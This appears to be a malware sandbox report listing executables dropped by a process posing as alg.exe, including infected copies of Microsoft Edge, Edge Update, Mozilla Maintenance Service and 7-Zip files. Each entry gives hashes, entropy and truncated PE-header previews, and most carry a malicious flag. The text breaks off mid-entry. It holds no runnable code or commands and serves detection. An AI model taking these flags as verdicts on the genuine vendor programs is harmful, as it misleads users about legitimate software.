SHA-512:	847143DF84749A09C24968694666265C5B8235D6BB0331D6360840E8AA6BABF9007D1005FF3703909A85E93CDAAB0924B2F392ED81E0877A47F8671A242B0D0A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@....................................U..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.748478922962785
Encrypted:	false
SSDEEP:	49152:bB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EBDmg27RnWGj:PHzorVmr2ZkRpdJYolnD527BWG
MD5:	A6280498F32906DF5CC9F2ADA5F7E58A
SHA1:	6BC5AF3A5B50A2DABFC79B6AF963BEAB42475E7C
SHA-256:	3E12A651F734C85232EDEDFA89C371B18C9C1600DEFE60572AE01A364252320F
SHA-512:	53F27A3425B4AD328FC8991AFFBE6A1F04A823561FB636348A7121B7E49B54EA424E52727B99C7C54202C6B7A5404F42F477430D3A65C10829FD66B158D3D7E9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....2vC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238528
Entropy (8bit):	5.1469407565498
Encrypted:	false
SSDEEP:	12288:U3w1uVdSEjiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:UEyTisqjnhMgeiCl7G0nehbGZpbD
MD5:	8145819F84A6453891027434F9D06CBF
SHA1:	EB1C66B7074A6F624D1C7071986FE69DCBDC5D28
SHA-256:	9DF3217DC68C2E2955514B08E3749739483EFFCC23EA5767FBFB1273C7CFE974
SHA-512:	71088D270A65E8E3E5F64791528F0CE1025662B6858A516CF39B94FD73760038C82E39A5095FD475AC798248DEBFC326CB328811654581D2306289B76F041A3A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.049981297076579
Encrypted:	false
SSDEEP:	49152:8hDdVrQ95RW0YEHyWQXE/09Val0GnDmg27RnWGj:8hHYW+HyWKED527BWG
MD5:	A24F8FAC0C18922003D041CBD7188CCD
SHA1:	08B5B06BA033756DF0A73F0E7C8BC0E0B7D248B1
SHA-256:	B2A3E48F7CB002D71C5737A3AFFCF8171FDC79C02E96D3F173FDF554579D3E40
SHA-512:	EEF1DBE2AA5019CCE489BD4AE686E4A598F0990813CA3F2C722CB674BDBCBC0DB9A437DD5E2C0AF8854C739D4910D57FF3AA68AB0147D2391341B0438622131E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....R.$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.158492993324372
Encrypted:	false
SSDEEP:	24576:D70E0ZCQZMiU6Rrt9RoctGfmddNsqjnhMgeiCl7G0nehbGZpbD:v0EzQSyRPRoc1tDmg27RnWGj
MD5:	2853826171CDABE7E4E81C67EF2E45D9
SHA1:	25F88870EBD0FBBBBF3256AD2FC1DAFFA7574D52
SHA-256:	304819C14739CB962FEDEB1C2A801011A073CF2BE86B96448AFA91C553FA07B6
SHA-512:	DF4C62AE8A5CCF3B47C07FC25256C0BE9848A448EE22DF2395148137BFEC0E069AD770209040E0937619D3B13E75E2188D3C8839B24E536362D9011A9E9E679D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......[i.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145487947455357
Encrypted:	false
SSDEEP:	24576:iiD2VmA1YXwHwlklb8boUuWPg2gWsqjnhMgeiCl7G0nehbGZpbD:RD2VmAyiwIb8boQhDmg27RnWGj
MD5:	5A3F85AAE47905A9436C7ED52AB95F0D
SHA1:	E72CD0336E26EA0AF4BD478B41835912DE07C088
SHA-256:	09AE474A12518CC884E343760198BA32DC71869DE989B2D18B860D7934137F69
SHA-512:	9CB8EC9C5D0F7D565C95486A75C3D39B2F25B21615CFF55386C9EDA9EA12E863F2F845DFC444C91679C216294F15C5CAF582A8EE6C1A7720D0A9AD09F6B60840
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......U.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2853376
Entropy (8bit):	6.950751574051545
Encrypted:	false
SSDEEP:	49152:/fD3zO9ZhBGloizM3HRNr00ZDmg27RnWGj:HDaalxzM00ZD527BWG
MD5:	6BC6355B605315958D82D51B93455262
SHA1:	5011D6AC188D52E86DCE683D8FDA5B2048A2F0F4
SHA-256:	3201EE9D01831BACAA0CF59A1E59DE96EB209A6BCFDB1237FBB407EBB77D1283
SHA-512:	CB7BDE7607BD5AD3A7D3719DF692AFB4ACD1E61AC144130A6CE77FC7C8B2308FB01C9C50AA328392B510AA65F64B6BD0AAB4257A0BA94A18397B37CEF290CC63
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....-.+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4320256
Entropy (8bit):	6.824614287447817
Encrypted:	false
SSDEEP:	49152:cTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPheDmg27RnN:fI72LvkrDpbxJRoIMxD527BWG
MD5:	6C4BAD431F555282390D536C2FE0ACBC
SHA1:	B41158A1882B3367EB4F31652FA63FFF333572A5
SHA-256:	11AD4A2719E6399C527BA6C947B4F1CF5335173D760B7533F68D01B459CCE2A9
SHA-512:	BEEA8531523FB58FFA0615EFB05DDBFD86A88AD973F1EA52D9968853DE497949C84A756593F52A5E9599CB768A3ABD90F78E55566170F8B4938EB0819BB8595E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2062336
Entropy (8bit):	7.097241657314622
Encrypted:	false
SSDEEP:	24576:uW9Jml9mmijviMnF+ZxmQWcbLw8VdsqjnhMgeiCl7G0nehbGZpbD:uWnm5iOMkjmQWkVBDmg27RnWGj
MD5:	DD18393AA8321A85E79682AB520AB0CA
SHA1:	A94C97395C97F627EC475CD94873ACE33CEBDEFC
SHA-256:	64925905D04F7C77160FDC47D6B3221542151B837F750CF001AEBAF76368659B
SHA-512:	004253969E8EEC543C8578927E39090B49C04E8FD8708129FE1E9BD0924ECAC57D8AFC104C1971816E81B2052CB872827D88D92D232D593BE45DB30F574C5830
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .......... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............\|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.16637102648637
Encrypted:	false
SSDEEP:	24576:bwNHwoYhua6MtjRO4qbBJTY6mY1uIg7sqjnhMgeiCl7G0nehbGZpbD:bwNPdQO7BJTfmE0Dmg27RnWGj
MD5:	54C4F80A7CC1CD350912519A7B9C5AF9
SHA1:	DA29537627A1F312F04C249A1B0A7A10BA531FD3
SHA-256:	72C8649FA0F7FAFC2E36C7FE2F30979B0BB1601426AB4EE05DFE97ED5076B6B5
SHA-512:	BFE3D70063503BA8E683AC9FDF58D71561E5ACFAA225067D83ED39145F6A137D886040274C64B49FD3204F7498B901DB69BFE17915F2214775FCC1FA0BF02F37
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@....................................(..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145482761713027
Encrypted:	false
SSDEEP:	24576:FiD2VmA1YXwHwlklb8boUuWPg2gWsqjnhMgeiCl7G0nehbGZpbD:UD2VmAyiwIb8boQhDmg27RnWGj
MD5:	8BF95769D067840A9B4BF5C7383841E8
SHA1:	C4AA0AB7D6422C7DB0DD8BEFAF703C67F34A4842
SHA-256:	82484FD8F263A6261E1BFBF66B5B445C6890E8BDE8F34947E7778EF26AF10385
SHA-512:	A57ECEA58079F490CDBC18DFC6F64CCB4D94FCE5FEC5D734423C9D6D2B1F54867CA405ADE108B571A69C0E0E377637810834114F6443E3DCB543AD0B64B63E8C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......c.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166364282563814
Encrypted:	false
SSDEEP:	24576:CwNHwoYhua6MtjRO4qbBJTY6mY1uIg7sqjnhMgeiCl7G0nehbGZpbD:CwNPdQO7BJTfmE0Dmg27RnWGj
MD5:	0AF5A578887D5597461512CC7D7E7D57
SHA1:	3370185F2A75F4D3960FACCBB89A9105740DD0D4
SHA-256:	EB1FEF9888587544F2AAE22D2DAEEE70D6B06C913A921FD0C760372D8D9698EC
SHA-512:	1E83D76C4F378F135B5B0C206B5D4F93835FA04DEF2228E92AF55F5E3FCE342F5F44CF018BF9BDCB7463F69930A81DA27A5747A3C9C4A0C48B53D4B2DFFACB5E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@....................................3..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1325568
Entropy (8bit):	5.141847499093049
Encrypted:	false
SSDEEP:	24576:m4lbht6BHMsqjnhMgeiCl7G0nehbGZpbD:HlNtqH4Dmg27RnWGj
MD5:	48770F4E9955FC239FD97F058FBCD0AD
SHA1:	82A8911C2E67BA5A29BB232C04B6D2DB39B70244
SHA-256:	5ECD116F8D5AB71718B61E9426B0C3E7C482FAECB7E9B99832C3DD9A82701A76
SHA-512:	926559B0E43556BEB16B4F85BA7020F56406F973BA593678FDEA50E88F82F23134656864B0229E9256B5F7FB3F6C3597F00FC0CC75E4CA8E376B74BE073C01C4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................oU......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138864176989538
Encrypted:	false
SSDEEP:	12288:LIkOkTB+wIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:LIxkTBVIsqjnhMgeiCl7G0nehbGZpbD
MD5:	48594EEBEF3F4D8C539C61E8A0BAE296
SHA1:	A8C52D62374EEF18A2CA3199459DC936E67A30D8
SHA-256:	837742C46F3785EB0698ACE96BC020AFBE6F4265B24D6176A357DD8D1DCCAD66
SHA-512:	461B7B21DE4C92F91CE914FC6C95E2EEE74A38E62922D70FC3052A67DDDD8BFAE075D2DEF0892594E2EEE1B12DC1B330309F505A7FD54CD2E5926AF7ED781891
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335296
Entropy (8bit):	5.236778416145552
Encrypted:	false
SSDEEP:	12288:P4lssmroCDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PcssmrhsqjnhMgeiCl7G0nehbGZpbD
MD5:	30DA100A840597403D1B027AF1F52CD0
SHA1:	08E2F63F9FDB1195C9D597180EDFBFFC9E2D9746
SHA-256:	D6F54B88F33209053DEBE12FB0652286C095BE3003BF860DACAD980DA977391C
SHA-512:	413B830692775A0CDCAECDECD9F976234E84F05A5DA5C0DA7E5C14649AA4546A2789DA763EE1F6027A5F08C5E8C4D9807C184B6210145ABF87166CB1ED2AE135
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.....................................M.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	5.338533444693467
Encrypted:	false
SSDEEP:	24576:403cT++foSBWU2YxhkgqsqjnhMgeiCl7G0nehbGZpbD:/3cK+foQWU2YnP+Dmg27RnWGj
MD5:	198E5879330EA5779C00949B72E45DAF
SHA1:	8D9FC77C2B25BEE6744D7629382C2EDBD796755B
SHA-256:	8AB3AF7EDDD447AA80309E576828F484724C9260758818EF6193804BFF928238
SHA-512:	FB0C48FE6EC4DAEB90F79ACC1D0101D91017A451ACD0C831FC4745EF42836EB9F4C27D7C615D58A7BD62DBA9F7ECA57BB7E4E4D58CBC8F5275826EF70747C320
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138910603478574
Encrypted:	false
SSDEEP:	12288:7brNRzB+NKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:7bBRzBgKsqjnhMgeiCl7G0nehbGZpbD
MD5:	8ADD569EB5749D2AB161F487E23451EB
SHA1:	56FF9D63D94D18853F4E769CB68484DF99CEE129
SHA-256:	A4052392FBABBC4B6B89520FF4A814AE8FF844D5D1209BC0063C4F099BFF9555
SHA-512:	50FDEB56A2B0499A1B3F8EAFB5C2385E58FAACD219F49D779730186FB43A5907E111AEA41E3D52708F2BDAFCBA8C57B9DB3A6B0CCFDC6E3BA84D854C39217368
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@..................................K..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.940558542370681
Encrypted:	false
SSDEEP:	49152:Ny53w24gQu3TPZ2psFkiSqwozMDmg27RnWGj:NyFQgZqsFki+ozMD527BWG
MD5:	FB7002D439735B0969E87CF03DB3E9A7
SHA1:	8ECE116F85B291A6C88561294A187086ED42C860
SHA-256:	A0DEA452B9DCF968F0F6BD2CF64B23D93242D0BCDFC1F0144DE73FBD2FE3B54A
SHA-512:	BE48E72429317D6725875200A6F5D8A7CFB7EA2D1AB769301B931E6BBCA527087C1D9C6A2B8EB4ED49EC6AC2AE8A45F091642089E00641345E8016147FEBA852
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....&."......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.84663130450546
Encrypted:	false
SSDEEP:	96:0KtqLHtgTURd5ek9+lmwCtWlOkWmXmAitWtu7Xbgo:FdU
MD5:	8F7418E8C4528476616919C3D70AB3C4
SHA1:	096BDD13C3B694DE78B898006C14DBB476BBDC1C
SHA-256:	917290B93FA21FCC2355B5B9715682DDB7D6FE3D8E55D4DA0E4ED2D93D58592E
SHA-512:	A95FA6BD5C79521F287BD0E223EBC705473FD001B48AC65A501F8795D0879E4F838E2035883CEB88E645F0E6FC75635CB0B301078CD9555EFB04DA0F36A2E286
Malicious:	false
Reputation:	unknown
Preview:	2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-31 03:05:15-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-31 03:05:15-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-31 03:05:15-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-31 03:05:1

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347825314283742
Encrypted:	false
SSDEEP:	24576:0QVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:LVTZu0Dmg27RnWGj
MD5:	AF4EAE172A1ED3A96A4B508B5229B3B2
SHA1:	6451D84887E2F7EB272841ECD2DC80DA66CE5E9E
SHA-256:	77F2D4A8F211E994CE95448E09AC265964328338118F3F2A22A0F4CDBFB6C94F
SHA-512:	3F4C139FF587D8A95B725866ED12972F219D7C1CD2D57E52760FDB2B8ED217BA42D11C26E1AAF52D1A6825B29B5281C6B3E966C2BF4B6607985008F6D1B7CD7A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......i.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	5.623125806435066
Encrypted:	false
SSDEEP:	24576:F+gkESfh4CoysqjnhMgeiCl7G0nehbGZpbD:sgkE+SYDmg27RnWGj
MD5:	F2A9FF054D6DAFB100D77970003DB81B
SHA1:	7485FBCFD16384EBBBF953C5C814FD8663D51E22
SHA-256:	A5FA21B4F969553DE83AF2BE62FF231AC81265D1ADB7BFB680A2F1DAE52D0D47
SHA-512:	EA4EF43C913816D57E5F4F09C20F3E23686DE14430E307440A010B31200A616EB0ECEBDB6B3C2CE0FDD59580C0C77737C3ED93D467A00AA81C93C0E406F67DC4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.096655046998541
Encrypted:	false
